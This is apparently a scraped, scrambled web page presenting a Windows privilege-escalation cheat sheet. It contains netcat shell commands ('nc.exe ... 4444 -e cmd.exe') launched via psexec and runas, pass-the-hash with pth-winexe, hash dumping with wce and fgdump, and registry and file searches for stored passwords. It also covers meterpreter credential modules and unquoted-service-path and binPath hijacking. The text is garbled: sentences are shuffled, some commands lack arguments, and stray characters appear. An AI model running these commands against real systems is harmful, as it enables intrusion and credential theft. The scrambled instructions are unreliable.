![windows exploit suggester windows exploit suggester](https://img-blog.csdnimg.cn/img_convert/008a4a34ad505ae9af704a70ff908e7e.png)
database file detected as xls or xlsx based on extension Once you know the updates installed, you can find known exploits using windows-exploit-suggester. If powershell is blocked, you can download: Port forward using meterpreter $ portfwd add -l -p -r You can find services bind to the loopback interface that are not reachable through the network running.look for LISTENING/LISTEN: netstat -ano Technique 3: $ psexec64 \\COMPUTERNAME -u Test -p test -h "c:\users\public\nc.exe -nc 4444 -e cmd.exe"ĮoP 5: Services only available from loopback $ powershell -ExecutionPolicy Bypass -File c:\users\public\r.ps1 ::Start("C:\users\public\nc.exe"," 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer) Technique 2: $ secpasswd = ConvertTo-SecureString "" -AsPlainText -Force Technique 1: C:\Windows\System32\runas.exe /env /noprofile /user: "c:\users\Public\nc.exe -nc 4444 -e cmd.exe" $ pth-winexe -U DOMAIN/user%hash //$ip cmd $ cd /usr/share/windows-binaries/fgdump python -m SimpleHTTPServer 80 You can do a hash dump in the affected system running: wce32.exe -wĭownload and run fgdump.exe on the target machine.
#Windows exploit suggester windows
Windows hash format: user:group:id:ntlmpassword:: Pass The Hash allows an attacker to authenticate to a remote target by using a valid combination of username and NTLM/LM hash rather than a cleartext password. Using meterpreter: > post/windows/gather/credentials/gpp
![windows exploit suggester windows exploit suggester](https://user-images.githubusercontent.com/34966120/122246609-1310fd80-ce9d-11eb-9bc5-4b6fdfd63310.png)
![windows exploit suggester windows exploit suggester](https://img-blog.csdnimg.cn/20201214235228541.png)
#Windows exploit suggester password
Search for password in registry $ reg query HKLM /f password /t REG_SZ /s Reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password Reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" Reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" Reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" Stuff in the registry: $ reg query HKLM /f password /t REG_SZ /s Type %WINDIR%\Panther\Unattend\Unattended.xml We might somtetimes find passwords in arbitrary files, you can find them running: $ findstr /si password *.txtįind all those strings in config files. You can autoamte with meterpreter: > exploit/windows/local/trusted_service_path We might even be able to override the service executable, always check out the permissions of the service binary: $ icacls "C:\Program Files (x86)\Program Folder" The following command will display affected services: $ wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ We could place our payload with any of the following paths: C:\Program.exe This occurs because windows will try, for every whitespace, to find the binary in every intermediate folder.įor example, the following path would be vulnerable: C:\Program Files\something\winamp.exe If we find a service running as SYSTEM/Administrator with an unquoted path and spaces in the path we can hijack the path and use it to elevate privileges. $ sc stop sc config binPath = "c:\inetpub\password = "" sc start EoP 2: Find unquoted paths